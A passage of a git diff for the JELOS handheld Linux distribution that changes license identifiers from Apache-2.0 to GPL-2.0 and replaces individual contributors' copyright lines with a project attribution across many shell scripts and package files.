b/packages/hardware/quirks/platforms/S922X/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Sleep is currently broken, so we'll disable it. diff --git a/packages/hardware/quirks/platforms/S922X/040-affinity b/packages/hardware/quirks/platforms/S922X/040-affinity index 39b5887df..852c85e32 100755 --- a/packages/hardware/quirks/platforms/S922X/040-affinity +++ b/packages/hardware/quirks/platforms/S922X/040-affinity @@ -1,7 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius -# Copyright (C) 2022-present Brooksytech +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/040-affinity SLOW_CORES="taskset -c 0-1" diff --git a/packages/hardware/quirks/platforms/S922X/050-modifiers b/packages/hardware/quirks/platforms/S922X/050-modifiers index d3e6f0a9b..9c906898f 100755 --- a/packages/hardware/quirks/platforms/S922X/050-modifiers +++ b/packages/hardware/quirks/platforms/S922X/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_KEY_VOLUMEDOWN=114 diff --git a/packages/hardware/quirks/platforms/S922X/060-game_settings b/packages/hardware/quirks/platforms/S922X/060-game_settings index 0b5a13960..63938e387 100755 --- a/packages/hardware/quirks/platforms/S922X/060-game_settings +++ b/packages/hardware/quirks/platforms/S922X/060-game_settings @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/platforms/S922X/090-ui_service b/packages/hardware/quirks/platforms/S922X/090-ui_service index eeafb89b2..bc7013fc9 100755 --- a/packages/hardware/quirks/platforms/S922X/090-ui_service +++ b/packages/hardware/quirks/platforms/S922X/090-ui_service @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Set the default device configuration cat </storage/.config/profile.d/090-ui_service diff --git a/packages/hardware/quirks/profile.d/999-export b/packages/hardware/quirks/profile.d/999-export index 5cbea664a..0d32125c3 100755 --- a/packages/hardware/quirks/profile.d/999-export +++ b/packages/hardware/quirks/profile.d/999-export @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### If you add a variable that should persist across processes, ### remember to export it here. diff --git a/packages/jelos/autostart/001-setup b/packages/jelos/autostart/001-setup index 44e68e0b5..470177f18 100755 --- a/packages/jelos/autostart/001-setup +++ b/packages/jelos/autostart/001-setup @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/autostart/002-kernel b/packages/jelos/autostart/002-kernel index 697b97d0a..e0243f504 100755 --- a/packages/jelos/autostart/002-kernel +++ b/packages/jelos/autostart/002-kernel @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/autostart/004-upgrade b/packages/jelos/autostart/004-upgrade index 5d3dae59a..5021e7c28 100755 --- a/packages/jelos/autostart/004-upgrade +++ b/packages/jelos/autostart/004-upgrade @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/autostart/006-display b/packages/jelos/autostart/006-display index c99bc0924..bd0a4a5f9 100755 --- a/packages/jelos/autostart/006-display +++ b/packages/jelos/autostart/006-display @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/autostart/007-rootpw b/packages/jelos/autostart/007-rootpw index 51d0b744f..f6a6343a7 100755 --- a/packages/jelos/autostart/007-rootpw +++ b/packages/jelos/autostart/007-rootpw @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/autostart/010-uimode b/packages/jelos/autostart/010-uimode index 2f003e405..9e9187d67 100755 --- a/packages/jelos/autostart/010-uimode +++ b/packages/jelos/autostart/010-uimode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/autostart/050-audio b/packages/jelos/autostart/050-audio index 4431d7cee..8cf7a79de 100755 --- a/packages/jelos/autostart/050-audio +++ b/packages/jelos/autostart/050-audio @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/autostart/055-hdmi-check b/packages/jelos/autostart/055-hdmi-check index 225a9102c..9bb3362b5 100755 --- a/packages/jelos/autostart/055-hdmi-check +++ b/packages/jelos/autostart/055-hdmi-check @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: MIT -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Copyright (C) 2023-present christianhaitian (https://github.com/christianhaitian) # Copyright (C) 2023-present Rocky5 (https://github.com/rocky5) diff --git a/packages/jelos/autostart/080-network b/packages/jelos/autostart/080-network index b5942005d..213ef26cd 100755 --- a/packages/jelos/autostart/080-network +++ b/packages/jelos/autostart/080-network @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/autostart/099-networkservices b/packages/jelos/autostart/099-networkservices index 6858a76cf..7b605c649 100755 --- a/packages/jelos/autostart/099-networkservices +++ b/packages/jelos/autostart/099-networkservices @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/jelos/package.mk b/packages/jelos/package.mk index ada2710eb..50faf9ebf 100644 --- a/packages/jelos/package.mk +++ b/packages/jelos/package.mk @@ -1,10 +1,10 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="jelos" PKG_VERSION="" PKG_ARCH="any" -PKG_LICENSE="apache2" +PKG_LICENSE="GPLv2" PKG_SITE="" PKG_URL="" PKG_DEPENDS_TARGET="toolchain" diff --git a/packages/jelos/profile.d/001-functions b/packages/jelos/profile.d/001-functions index 6b5724a44..eb28b087a 100644 --- a/packages/jelos/profile.d/001-functions +++ b/packages/jelos/profile.d/001-functions @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/os-release diff --git a/packages/jelos/profile.d/020-audio_latency.conf b/packages/jelos/profile.d/020-audio_latency.conf index 73ca00949..90f039db0 100644 --- a/packages/jelos/profile.d/020-audio_latency.conf +++ b/packages/jelos/profile.d/020-audio_latency.conf @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) AUDIO_LATENCY=$(get_setting audiolatency) if [ -n "${AUDIO_LATENCY}" ] diff --git a/packages/jelos/profile.d/099-freqfunctions b/packages/jelos/profile.d/099-freqfunctions index c382f9331..2954b68f4 100644 --- a/packages/jelos/profile.d/099-freqfunctions +++ b/packages/jelos/profile.d/099-freqfunctions @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/os-release diff --git a/packages/jelos/sources/post-update b/packages/jelos/sources/post-update index d85d5c4e0..93b607bc0 100644 --- a/packages/jelos/sources/post-update +++ b/packages/jelos/sources/post-update @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/amionline b/packages/jelos/sources/scripts/amionline index bf3686e65..3551d0478 100755 --- a/packages/jelos/sources/scripts/amionline +++ b/packages/jelos/sources/scripts/amionline @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ip route | awk '/default/ {print $3}' >/dev/null 2>&1 if [ ! $? = 0 ] diff --git a/packages/jelos/sources/scripts/automount b/packages/jelos/sources/scripts/automount index 2bfffeccc..ed9a646ee 100755 --- a/packages/jelos/sources/scripts/automount +++ b/packages/jelos/sources/scripts/automount @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020 Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile . /etc/os-release diff --git a/packages/jelos/sources/scripts/backuptool b/packages/jelos/sources/scripts/backuptool index 49063e7aa..805c960cf 100755 --- a/packages/jelos/sources/scripts/backuptool +++ b/packages/jelos/sources/scripts/backuptool @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020 Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/brightness b/packages/jelos/sources/scripts/brightness index 5cc3d6778..b3e0221ef 100755 --- a/packages/jelos/sources/scripts/brightness +++ b/packages/jelos/sources/scripts/brightness @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ## Load minimal distribution settings to improve ## performance. diff --git a/packages/jelos/sources/scripts/chksysconfig b/packages/jelos/sources/scripts/chksysconfig index 16407f586..1e946475d 100755 --- a/packages/jelos/sources/scripts/chksysconfig +++ b/packages/jelos/sources/scripts/chksysconfig @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/factoryreset b/packages/jelos/sources/scripts/factoryreset index fe2783f47..66928b8b2 100755 --- a/packages/jelos/sources/scripts/factoryreset +++ b/packages/jelos/sources/scripts/factoryreset @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022 Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) case "${1}" in "retroarch") diff --git a/packages/jelos/sources/scripts/getfilters b/packages/jelos/sources/scripts/getfilters index 800f12247..24624ee5b 100755 --- a/packages/jelos/sources/scripts/getfilters +++ b/packages/jelos/sources/scripts/getfilters @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022 Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) find /usr/share/retroarch/filters/64bit/video/ -name '*.filt' -print0 | while IFS= read -r -d '' line; do diff --git a/packages/jelos/sources/scripts/getshaders b/packages/jelos/sources/scripts/getshaders index 0a76d8da4..aeef22de1 100755 --- a/packages/jelos/sources/scripts/getshaders +++ b/packages/jelos/sources/scripts/getshaders @@ -4,7 +4,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022 Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) if [[ "${UI_SERVICE}" =~ ^weston ]] then diff --git a/packages/jelos/sources/scripts/led_flash b/packages/jelos/sources/scripts/led_flash index 5bda18ceb..3bae90477 100644 --- a/packages/jelos/sources/scripts/led_flash +++ b/packages/jelos/sources/scripts/led_flash @@ -1,6 +1,6 @@ #!/bin/sh # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/manage_mpv.sh b/packages/jelos/sources/scripts/manage_mpv.sh index b55bd6cc8..ef67679b0 100755 --- a/packages/jelos/sources/scripts/manage_mpv.sh +++ b/packages/jelos/sources/scripts/manage_mpv.sh @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present ShantiGilbert, RedWolfTech, Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) function sendkey() { echo '{"command":["keypress", "'${1}'"]}' | socat - "/tmp/mpvsocket" diff --git a/packages/jelos/sources/scripts/paneladj b/packages/jelos/sources/scripts/paneladj index 990154e5c..2f25badde 100755 --- a/packages/jelos/sources/scripts/paneladj +++ b/packages/jelos/sources/scripts/paneladj @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/run b/packages/jelos/sources/scripts/run index 92686468f..022d70176 100755 --- a/packages/jelos/sources/scripts/run +++ b/packages/jelos/sources/scripts/run @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/runemu.sh b/packages/jelos/sources/scripts/runemu.sh index 62d999b88..11d623889 100755 --- a/packages/jelos/sources/scripts/runemu.sh +++ b/packages/jelos/sources/scripts/runemu.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/jelos/sources/scripts/say b/packages/jelos/sources/scripts/say index fc510ef0f..9e4a0a641 100755 --- a/packages/jelos/sources/scripts/say +++ b/packages/jelos/sources/scripts/say @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/setrootpass b/packages/jelos/sources/scripts/setrootpass index 5bacbe178..ce4120b1e 100755 --- a/packages/jelos/sources/scripts/setrootpass +++ b/packages/jelos/sources/scripts/setrootpass @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/setsettings.sh b/packages/jelos/sources/scripts/setsettings.sh index 5c171d4c6..f1e91c067 100755 --- a/packages/jelos/sources/scripts/setsettings.sh +++ b/packages/jelos/sources/scripts/setsettings.sh @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/show_changelog b/packages/jelos/sources/scripts/show_changelog index fea0c39a1..98f2598fa 100755 --- a/packages/jelos/sources/scripts/show_changelog +++ b/packages/jelos/sources/scripts/show_changelog @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/start_mplayer.sh b/packages/jelos/sources/scripts/start_mplayer.sh index c0d31e902..886eae3b6 100755 --- a/packages/jelos/sources/scripts/start_mplayer.sh +++ b/packages/jelos/sources/scripts/start_mplayer.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present redwolftech -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "mpv" diff --git a/packages/jelos/sources/scripts/system-upgrade b/packages/jelos/sources/scripts/system-upgrade index 2e711631b..22351ecf0 100755 --- a/packages/jelos/sources/scripts/system-upgrade +++ b/packages/jelos/sources/scripts/system-upgrade @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/timeinfo b/packages/jelos/sources/scripts/timeinfo index b23c0a37e..8b43dbe09 100755 --- a/packages/jelos/sources/scripts/timeinfo +++ b/packages/jelos/sources/scripts/timeinfo @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-2022 Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) function get_timezone() { readlink -f /etc/localtime | sed 's;/usr/share/zoneinfo/;;' diff --git a/packages/jelos/sources/scripts/toggle-ipv6 b/packages/jelos/sources/scripts/toggle-ipv6 index d9b674f07..2e4fc62ab 100755 --- a/packages/jelos/sources/scripts/toggle-ipv6 +++ b/packages/jelos/sources/scripts/toggle-ipv6 @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/updatecheck b/packages/jelos/sources/scripts/updatecheck index 2ec458d95..780428698 100755 --- a/packages/jelos/sources/scripts/updatecheck +++ b/packages/jelos/sources/scripts/updatecheck @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/jelos/sources/scripts/volume b/packages/jelos/sources/scripts/volume index ad572adaa..3021429a1 100644 --- a/packages/jelos/sources/scripts/volume +++ b/packages/jelos/sources/scripts/volume @@ -1,7 +1,7 @@ #!/bin/sh # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source minimal predefined functions and variables diff --git a/packages/jelos/sources/scripts/wifictl b/packages/jelos/sources/scripts/wifictl index 2a632214c..22bf7a622 100755 --- a/packages/jelos/sources/scripts/wifictl +++ b/packages/jelos/sources/scripts/wifictl @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020 Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Copyright (C) 2022 kkoshelev (https://github.com/kkoshelev) . /etc/profile diff --git a/packages/kernel/linux-drivers/RTL8812AU/package.mk b/packages/kernel/linux-drivers/RTL8812AU/package.mk index 558be310a..8ee88aa3b 100644 --- a/packages/kernel/linux-drivers/RTL8812AU/package.mk +++ b/packages/kernel/linux-drivers/RTL8812AU/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="RTL8812AU" PKG_VERSION="a320c573061786696f3f43554feb28b736887b10" diff --git a/packages/kernel/linux-drivers/RTL8814AU/package.mk b/packages/kernel/linux-drivers/RTL8814AU/package.mk index 65ea51ee5..90ce3f087 100644 --- a/packages/kernel/linux-drivers/RTL8814AU/package.mk +++ b/packages/kernel/linux-drivers/RTL8814AU/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="RTL8814AU" PKG_VERSION="6f80699e68fd2a9f2bba3f1a56ca06d1b7992bd8" diff --git a/packages/kernel/linux-drivers/RTL8821AU/package.mk b/packages/kernel/linux-drivers/RTL8821AU/package.mk index 4cec34d7f..3f446e668 100644 --- a/packages/kernel/linux-drivers/RTL8821AU/package.mk +++ b/packages/kernel/linux-drivers/RTL8821AU/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="RTL8821AU" PKG_VERSION="eade7b8803a6ecea5bef9f9a87f7c8186190e987" diff --git a/packages/kernel/linux-drivers/RTL8821CU/package.mk b/packages/kernel/linux-drivers/RTL8821CU/package.mk index 404367479..457fdec2f 100644 --- a/packages/kernel/linux-drivers/RTL8821CU/package.mk +++ b/packages/kernel/linux-drivers/RTL8821CU/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="RTL8821CU" PKG_VERSION="8e300c0885835b079ad1a99cccd960754a4c849f" diff --git a/packages/kernel/linux-drivers/RTL88x2BU/package.mk b/packages/kernel/linux-drivers/RTL88x2BU/package.mk index f41ab5908..78d8b3000 100644 --- a/packages/kernel/linux-drivers/RTL88x2BU/package.mk +++ b/packages/kernel/linux-drivers/RTL88x2BU/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="RTL88x2BU" PKG_VERSION="cb72035bfd9f2ac6593c58259b2461d338961f2d" diff --git a/packages/kernel/linux-drivers/ayn-platform/package.mk b/packages/kernel/linux-drivers/ayn-platform/package.mk index fb971fbc1..d2026222e 100644 --- a/packages/kernel/linux-drivers/ayn-platform/package.mk +++ b/packages/kernel/linux-drivers/ayn-platform/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ayn-platform" PKG_VERSION="068cce29a7ef31f32b6aed3ca8ab9c1c91308e41" diff --git a/packages/kernel/linux-drivers/ryzensmu/package.mk b/packages/kernel/linux-drivers/ryzensmu/package.mk index f99d92fb8..ca66cf516 100644 --- a/packages/kernel/linux-drivers/ryzensmu/package.mk +++ b/packages/kernel/linux-drivers/ryzensmu/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ryzensmu" PKG_VERSION="e61177d0ddaebfaeca52094b20a2289287a0838b" diff --git a/packages/kernel/linux-firmware/RTL8821CS-firmware/package.mk b/packages/kernel/linux-firmware/RTL8821CS-firmware/package.mk index 59bd7c125..838d310ac 100644 --- a/packages/kernel/linux-firmware/RTL8821CS-firmware/package.mk +++ b/packages/kernel/linux-firmware/RTL8821CS-firmware/package.mk @@ -1,6 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Brooksytech -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="RTL8821CS-firmware" PKG_VERSION="" diff --git a/packages/kernel/linux-firmware/asus-firmware/package.mk b/packages/kernel/linux-firmware/asus-firmware/package.mk index cb2ca88a5..d755f8d85 100644 --- a/packages/kernel/linux-firmware/asus-firmware/package.mk +++ b/packages/kernel/linux-firmware/asus-firmware/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="asus-firmware" PKG_VERSION="b7d9e3ed9cc14dbc5f1640309ae13dd627fc173a" diff --git a/packages/kernel/linux-firmware/libmali_rk3588/package.mk b/packages/kernel/linux-firmware/libmali_rk3588/package.mk index 778176ab6..b1cfa57ce 100755 --- a/packages/kernel/linux-firmware/libmali_rk3588/package.mk +++ b/packages/kernel/linux-firmware/libmali_rk3588/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="libmali_rk3588" PKG_VERSION="1.0" diff --git a/packages/lang/Python3/package.mk 